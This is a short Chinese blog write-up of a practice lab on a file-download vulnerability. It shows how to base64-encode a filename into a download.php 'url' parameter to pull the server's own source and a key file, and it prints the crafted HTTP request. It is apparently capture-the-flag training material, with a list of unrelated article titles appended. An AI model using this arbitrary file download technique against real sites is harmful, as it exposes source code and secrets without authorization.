文件下载漏洞练习(一)
本文共 615 字,大约阅读时间需要 2 分钟。
(1)打开网页
(2)同样的先抓下包
我们注意到:
url=Y2hvdWJhZ3VhaS5tcDM 还有/download.php先解码看看是什么
是个文件名
(3)我们试着将其替换成、download.php
GET /download.php?url=ZG93bmxvYWQucGhw= HTTP/1.1Host: e2ad76b4d4b6d6ed.yunyansec.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Referer: http://e2ad76b4d4b6d6ed.yunyansec.com/Accept-Language: zh-CN,zh;q=0.9Connection: close
(4)文件下载成功,打开后发现还可以有hereiskey.php下载
同样先编码
得到key
转载于:https://blog.51cto.com/antivirusjo/2059595
你可能感兴趣的文章
javaScript事件(二)事件处理程序
查看>>
数据库——修改表信息(转)
查看>>
SQL 存储过程 解析XML
查看>>
Atitit.木马病毒自动启动-------------win7计划任务的管理
查看>>
Javascript学习总结三(Array对象的用法)
查看>>
hiho_1050_树中的最长路
查看>>
Centos6.5搭建java开发环境
查看>>
08Spring_Spring和junit测试集成
查看>>
ArcGIS API for Silverlight 点沿着线流动
查看>>
在kali linux之下安装wps之后 报错字体缺失
查看>>
rem计算适配
查看>>
MySQL主主双机负载均衡
查看>>
EL与OGNL以及值栈的理解
查看>>
utf8汉字编码16进制对照(转载)
查看>>
java基础之【堆、栈、方法区】结构图
查看>>
POJ3321:Apple Tree(树状数组)
查看>>
弹出框插件layer使用
查看>>
细说 iOS 消息推送
查看>>
官方 React 快速上手脚手架 create-react-app
查看>>
位运算和典型应用详解
查看>>